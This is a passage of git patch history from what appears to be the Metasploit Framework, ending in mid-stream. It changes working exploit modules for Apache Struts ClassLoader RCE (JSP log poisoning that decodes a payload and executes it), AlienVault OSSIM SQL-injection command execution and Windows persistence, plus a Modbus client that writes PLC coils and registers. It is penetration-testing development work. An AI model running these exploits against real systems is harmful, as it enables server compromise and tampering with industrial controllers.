system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), - OptString.new('PATH',[false, 'PATH to write payload']), + OptString.new('PATH',[false, 'Path to write payload']), ], self.class) end From 8b138b2d37f95a17a83f1622817a38b543b5aadc Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Apr 2014 16:34:33 -0500 Subject: [PATCH 213/853] Fix unquoted path in cleanup script --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index b98e2e0970..92d355c3d1 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Local begin write_file(tempvbs, vbs) print_good("Persistent Script written to #{tempvbs}") - @clean_up_rc << "rm #{tempvbs}\n" + @clean_up_rc << "rm '#{tempvbs}'\n" rescue print_error("Could not write the payload on the target hosts.") # return nil since we could not write the file on the target host. From bd39af3965dd44fc8b17864aabbe50a989b5ab70 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 00:51:52 +0200 Subject: [PATCH 214/853] Fix target ARCH_JAVA and remove calls to sleep --- .../http/struts_code_exec_classloader.rb | 109 ++++++++++++++---- 1 file changed, 85 insertions(+), 24 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 7f040386e1..4bae6dd8ef 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -33,17 +33,18 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2014-0094'], + [ 'CVE', '2014-0112'], [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], - 'Platform' => %w{ java linux win }, + 'Platform' => %w{ linux win }, 'Privileged' => true, 'Targets' => [ ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'windows' + 'Platform' => 'w' } ], ['Linux Universal', @@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Java Universal', { 'Arch' => ARCH_JAVA, - 'Platform' => 'java' + 'Platform' => ['win','linux'] }, ] ], @@ -81,6 +82,11 @@ class Metasploit3 < Msf::Exploit::Remote end + def is_log_flushed(resp, content) + return (resp.headers["Content-Length"] != "0") && (resp.body =~ /#{content}/) + end + + def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) @@ -98,22 +104,54 @@ class Metasploit3 < Msf::Exploit::Remote jsp_file << date_format jsp_file << ".jsp" - vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") + # Wait till the log is created + uri = "/" + uri << jsp_file - Rex.sleep(3) + created = false + + print_status("#{peer} - Waiting for the server to create the logfile") + + 10.times do |x| + select(nil, nil, nil, 2) + + # Now make a request to trigger payload + vprint_status("#{peer} - Countdown #{10-x}...") + res = exec_cmd(uri) + # Failure. The request timed out or the server went away. + if res.nil? + print_error("#{peer} - Not received response") + return + end + # Success if the server has flushed all the sent commands to the jsp file + if res.code == 200 + vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") + created = true + break + end + end + + unless created + print_error("#{peer} - No log file was created") + return + end + + + if target['Arch'] == ARCH_JAVA + payload_exe = payload.encoded + else + payload_exe = generate_payload_exe + end + + payload_file = rand_text_alphanumeric(4+rand(4)) + payload_file << ".jsp" if (target['Arch'] == ARCH_JAVA) + register_files_for_cleanup("#{payload_file}", "#{jsp_file}") # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) - uri << rand_text_alphanumeric(4+rand(4)) - uri << "?" - uri << rand_text_alphanumeric(1+rand(1)) - uri << "=" + uri << payload_file - - payload_exe = generate_payload_exe - - payload_file = rand_text_alphanumeric(4+rand(4)) - register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + vprint_status("#{peer} - Dumping payload into the logfile") # Commands to be logged exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") @@ -124,21 +162,44 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") exec_cmd(uri, "<% oFile.flush(); %>") exec_cmd(uri, "<% oFile.close(); %>") - exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") - exec_cmd(uri, "<% f.setExecutable(true); %>") - exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") - vprint_status("#{peer} - Waiting 10 seconds...") + if target['Arch'] != ARCH_JAVA + exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") + exec_cmd(uri, "<% f.setExecutable(true); %>") + exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + end - Rex.sleep(10) - - vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") - - # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences uri = "/" uri << jsp_file - exec_cmd(uri) + flushed = false + + print_status("#{peer} - Waiting for the server to flush the logfile") + + 10.times do |x| + select(nil, nil, nil, 2) + + # Now make a request to trigger payload + vprint_status("#{peer} - Countdown #{10-x}...") + res = exec_cmd(uri) + # Failure. The request timed out or the server went away. + if res.nil? + print_error("#{peer} - Not received response") + return + end + # Success if the server has flushed all the sent commands to the jsp file + if res.code == 200 && is_log_flushed(res, payload_file) + flushed = true + break + end + end + + unless flushed + print_error("#{peer} - Log not flushed on time") + return + end + + exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) end From 9bcf5eadb7c7d02bf392255ae15dca72b2289804 Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 10:10:15 +0700 Subject: [PATCH 215/853] Changes to alienvault module --- .../linux/http/alienvault_sqli_exec.rb | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index e22c6b0cc6..297785aee5 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(443), - OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), + OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 0 ]) ], self.class) end @@ -270,6 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 404 print_status("#{peer} - Payload delivered") + Rex.sleep(datastore['WAIT']) else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -328,6 +330,25 @@ class Metasploit3 < Msf::Exploit::Remote else print_warning("#{peer} - Unable to remove Action ID") end + + # Reload the policies to revert back to the state before exploitation + print_status("#{peer} - Reloading Policies") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'what' => 'policies', + 'back' => '../policy/policy.php' + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + end + ensure super # mixins should be able to cleanup even in case of Exception end From c12d72b58c2d47c8520dd9e28b69f564092f99f3 Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 10:39:11 +0700 Subject: [PATCH 216/853] Changes to alienvault module --- .../linux/http/alienvault_sqli_exec.rb | 22 ++++--------------- 1 file changed, 4 insertions(+), 18 deletions(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 297785aee5..db85ce3a90 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), - OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 0 ]) + OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 3 ]) ], self.class) end @@ -255,27 +255,13 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 print_status("#{peer} - Policies reloaded!") + wait = datastore['WAIT'].to_i + print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") + Rex.sleep(wait) else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end - - # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dont_exist), - 'cookie' => @cookie - }) - - if res && res.code == 404 - print_status("#{peer} - Payload delivered") - Rex.sleep(datastore['WAIT']) - else - fail_with(Failure::Unknown, "#{peer} - Payload failed!") - end - end From 5db24b83517524f18fb2fbb907968384c0d8dccf Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 14:53:55 +0700 Subject: [PATCH 217/853] Fixes/Stability AlienVault module --- .../linux/http/alienvault_sqli_exec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index db85ce3a90..463a44530f 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -180,8 +180,9 @@ class Metasploit3 < Msf::Exploit::Remote 'dests[]' => '00000000000000000000000000000000', # Destination is ANY 'portsrc[]' => '0', # Any source port 'portdst[]' => '0', # Any destination port - 'plug_type' => '0', # Any plugin type + 'plug_type' => '1', # Taxonomy 'plugins[0]' => 'on', + 'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found 'tax_pt' => '0', 'tax_cat' => '0', 'tax_subc' => '0', @@ -255,11 +256,26 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + end + + # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. + dontexist = rand_text_alpha(8+rand(4)) + print_status("#{peer} - Triggering policy and action by requesting a non existing url") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, dontexist), + 'cookie' => @cookie + }) + + if res and res.code == 404 + print_status("#{peer} - Payload delivered") wait = datastore['WAIT'].to_i print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") Rex.sleep(wait) else - fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + fail_with(Failure::Unknown, "#{peer} - Payload failed!") end end From f0a8f40acdbcba69e800a42ca4f41381e52db9b9 Mon Sep 17 00:00:00 2001 From: nstarke Date: Thu, 1 May 2014 13:41:15 +0000 Subject: [PATCH 218/853] Omitting timestamp from msfconsole search output SeeRM #8795 The disclosure date field in the results from the search command where returning with a timestamp that was almost always 00:00:00 UTC. I added a bit of date time formatting to only include the year (4 digit), month (2 digit), and day (2 digit) in the following format: Y-m-d. This date time formatting applies to both searches conducted through the database instance as well as searches performed without a database (slow search). --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..d9aa5976ce 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1488,7 +1488,7 @@ class Core next if not o if not o.search_filter(match) - tbl << [ o.fullname, o.disclosure_date.to_s, o.rank_to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), o.rank_to_s, o.name ] end end end @@ -1503,7 +1503,7 @@ class Core def search_modules_sql(search_string) tbl = generate_module_table("Matching Modules") framework.db.search_modules(search_string).each do |o| - tbl << [ o.fullname, o.disclosure_date.to_s, RankingName[o.rank].to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), RankingName[o.rank].to_s, o.name ] end print_line(tbl.to_s) end From 78cefae607d4d40deed44b93aa3db176fed11bee Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:07:26 -0500 Subject: [PATCH 219/853] Use WfsDelay --- .../linux/http/alienvault_sqli_exec.rb | 21 ++++++------------- 1 file changed, 6 insertions(+), 15 deletions(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 463a44530f..6a9e1eabb4 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -32,7 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'SSL' => true + 'SSL' => true, + 'WfsDelay' => 10 }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -54,8 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(443), - OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), - OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 3 ]) + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) ], self.class) end @@ -261,22 +261,13 @@ class Metasploit3 < Msf::Exploit::Remote end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie - }) - - if res and res.code == 404 - print_status("#{peer} - Payload delivered") - wait = datastore['WAIT'].to_i - print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") - Rex.sleep(wait) - else - fail_with(Failure::Unknown, "#{peer} - Payload failed!") - end + }) end From 1b39712b73c16f57fabc604b33432f0774829d0d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:10:16 -0500 Subject: [PATCH 220/853] Redo response check --- modules/exploits/linux/http/alienvault_sqli_exec.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 6a9e1eabb4..502fa8126b 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -269,6 +269,12 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => @cookie }) + if res and res.code == 404 + print_status("#{peer} - Payload delivered") + else + fail_with(Failure::Unknown, "#{peer} - Payload failed!") + end + end From bd124c85cb2f9158da368f61b0dfd108a42fb898 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 09:52:55 -0500 Subject: [PATCH 221/853] Use metadata format for actions --- .../auxiliary/scanner/scada/modbusclient.rb | 36 +++++++++---------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index cc630539df..b19a847d62 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Modbus Client Utility', 'Description' => %q{ This module allows reading and writing data to a PLC using the Modbus protocol. - This module is based on the 'modiconstop.rb' Basecamp module from - DigitalBond, as well as the mbtget perl script. + This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond, + as well as the mbtget perl script. }, 'Author' => [ @@ -23,12 +23,15 @@ class Metasploit3 < Msf::Auxiliary 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, - 'Actions' => [AuxiliaryAction.new('READ_COIL', {'Description' => "Read one bit from a coil"}), - AuxiliaryAction.new('WRITE_COIL', {'Description' => "Write one bit to a coil"}), - AuxiliaryAction.new('READ_REGISTER', {'Description' => "Read one word from a register"}), - AuxiliaryAction.new('WRITE_REGISTER', {'Description' => "Write one word to a register"}) - ] + 'Actions' => + [ + ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], + ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], + ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], + ] )) + register_options( [ Opt::RPORT(502), @@ -48,8 +51,7 @@ class Metasploit3 < Msf::Auxiliary end def make_read_payload - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") @@ -60,12 +62,11 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def make_write_coil_payload(data) - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("c") @@ -77,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def make_write_register_payload(data) @@ -93,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary packet_data += [payload.size].pack("c") # size byte packet_data += payload - return packet_data + packet_data end def run @@ -104,13 +105,11 @@ class Metasploit3 < Msf::Auxiliary @function_code = 1 response = send_frame(make_read_payload) print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) - when "READ_REGISTER" @function_code = 3 response = send_frame(make_read_payload) value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) - when "WRITE_COIL" @function_code = 5 if datastore['DATA'] == 0 @@ -123,7 +122,6 @@ class Metasploit3 < Msf::Auxiliary end response = send_frame(make_write_coil_payload(data)) print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") - when "WRITE_REGISTER" @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 @@ -132,10 +130,10 @@ class Metasploit3 < Msf::Auxiliary end response = send_frame(make_write_register_payload(datastore['DATA'])) print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") - else print_error("Invalid ACTION") - return end + + disconnect end end \ No newline at end of file From 28e9057113361fa687f78a64725faabda63add27 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 10:23:33 -0500 Subject: [PATCH 222/853] Refactor make_payload --- .../auxiliary/scanner/scada/modbusclient.rb | 27 +++++++++---------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index b19a847d62..c8bef69703 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -50,17 +50,22 @@ class Metasploit3 < Msf::Auxiliary return r end + def make_payload(payload) + packet_data = [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload + + packet_data + end + def make_read_payload payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end @@ -72,11 +77,7 @@ class Metasploit3 < Msf::Auxiliary payload += [data].pack("c") payload += "\x00" - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end @@ -88,11 +89,7 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") - packet_data = "" - packet_data += [@modbus_counter].pack("n") - packet_data += "\x00\x00\x00" #dunno what these are - packet_data += [payload.size].pack("c") # size byte - packet_data += payload + packet_data = make_payload(payload) packet_data end From cc2e6807241516e3cf40d06348aed810477ebba2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 11:04:29 -0500 Subject: [PATCH 223/853] Refactor --- .../auxiliary/scanner/scada/modbusclient.rb | 90 ++++++++++++------- 1 file changed, 60 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index c8bef69703..ca6275a659 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary def send_frame(payload) sock.put(payload) @modbus_counter += 1 - r = sock.get + r = sock.get(sock.def_read_timeout) return r end @@ -82,9 +82,8 @@ class Metasploit3 < Msf::Auxiliary packet_data end - def make_write_register_payload(data) - payload = "" - payload += [datastore['UNIT_NUMBER']].pack("c") + def make_write_register_payload(data) + payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") @@ -94,43 +93,74 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def read_coil + @function_code = 1 + response = send_frame(make_read_payload) + if response.nil? + print_error("No answer for the READ COIL") + return + end + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) + end + + def read_register + @function_code = 3 + response = send_frame(make_read_payload) + if response.nil? + print_error("No answer for the READ REGISTER") + return + end + value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') + print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + end + + def write_coil + @function_code = 5 + if datastore['DATA'] == 0 + data = 0 + elsif datastore['DATA'] == 1 + data = 255 + else + print_error("Data value must be 0 or 1 in WRITE_COIL mode") + return + end + response = send_frame(make_write_coil_payload(data)) + if response.nil? + print_error("No answer for the WRITE COIL") + return + end + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") + end + + def write_register + @function_code = 6 + if datastore['DATA'] < 0 || datastore['DATA'] > 65535 + print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") + return + end + response = send_frame(make_write_register_payload(datastore['DATA'])) + if response.nil? + print_error("No answer for the WRITE REGISTER") + return + end + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + end + def run @modbus_counter = 0x0000 # used for modbus frames connect case datastore['ACTION'] when "READ_COIL" - @function_code = 1 - response = send_frame(make_read_payload) - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) + read_coil when "READ_REGISTER" - @function_code = 3 - response = send_frame(make_read_payload) - value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') - print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + read_register when "WRITE_COIL" - @function_code = 5 - if datastore['DATA'] == 0 - data = 0 - elsif datastore['DATA'] == 1 - data = 255 - else - print_error("Data value must be 0 or 1 in WRITE_COIL mode") - exit - end - response = send_frame(make_write_coil_payload(data)) - print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") + write_coil when "WRITE_REGISTER" - @function_code = 6 - if datastore['DATA'] < 0 || datastore['DATA'] > 65535 - print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") - exit - end - response = send_frame(make_write_register_payload(datastore['DATA'])) - print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + write_register else print_error("Invalid ACTION") end - disconnect end end \ No newline at end of file From d3045814a20b01f9baf97fe573d8077c84793e91 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 11:05:55 -0500 Subject: [PATCH 224/853] Add print_status messages --- modules/auxiliary/scanner/scada/modbusclient.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index ca6275a659..43e7cd99a4 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -95,6 +95,7 @@ class Metasploit3 < Msf::Auxiliary def read_coil @function_code = 1 + print_status("Sending READ COIL...") response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ COIL") @@ -105,6 +106,7 @@ class Metasploit3 < Msf::Auxiliary def read_register @function_code = 3 + print_status("Sending READ REGISTER...") response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ REGISTER") @@ -124,6 +126,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data value must be 0 or 1 in WRITE_COIL mode") return end + print_status("Sending WRITE COIL...") response = send_frame(make_write_coil_payload(data)) if response.nil? print_error("No answer for the WRITE COIL") @@ -138,6 +141,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") return end + print_status("Sending WRITE REGISTER...") response = send_frame(make_write_register_payload(datastore['DATA'])) if response.nil? print_error("No answer for the WRITE REGISTER") From 3374af83abef23c17eb1c1be33146705c5a3b0f6 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 19:44:07 +0200 Subject: [PATCH 225/853] Fix typos --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 4bae6dd8ef..e75cecbf60 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'w' + 'Platform' => 'win' } ], ['Linux Universal', @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'linux' } ], - [ 'Java Universal', + ['Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => ['win','linux'] From e0ee31b388fa268e63b8389f330a36ce722c9a58 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 20:19:31 +0200 Subject: [PATCH 226/853] Modify print_error by fail_with --- .../http/struts_code_exec_classloader.rb | 25 ++++++------------- 1 file changed, 8 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index e75cecbf60..ad279627f4 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -118,11 +118,10 @@ class Metasploit3 < Msf::Exploit::Remote # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") res = exec_cmd(uri) + # Failure. The request timed out or the server went away. - if res.nil? - print_error("#{peer} - Not received response") - return - end + fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") @@ -131,11 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - unless created - print_error("#{peer} - No log file was created") - return - end - + fail_with(Failure::TimeoutExpired, "No log file was created") unless created if target['Arch'] == ARCH_JAVA payload_exe = payload.encoded @@ -182,11 +177,10 @@ class Metasploit3 < Msf::Exploit::Remote # Now make a request to trigger payload vprint_status("#{peer} - Countdown #{10-x}...") res = exec_cmd(uri) + # Failure. The request timed out or the server went away. - if res.nil? - print_error("#{peer} - Not received response") - return - end + fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && is_log_flushed(res, payload_file) flushed = true @@ -194,10 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - unless flushed - print_error("#{peer} - Log not flushed on time") - return - end + fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) From f7d8a5e3a39a4e0816c83e3a66a2b195f79b4ff2 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 1 May 2014 21:43:58 +0200 Subject: [PATCH 227/853] rework the openssl_heartbleed module --- .../scanner/ssl/openssl_heartbleed.rb | 514 +++++++++++++----- 1 file changed, 369 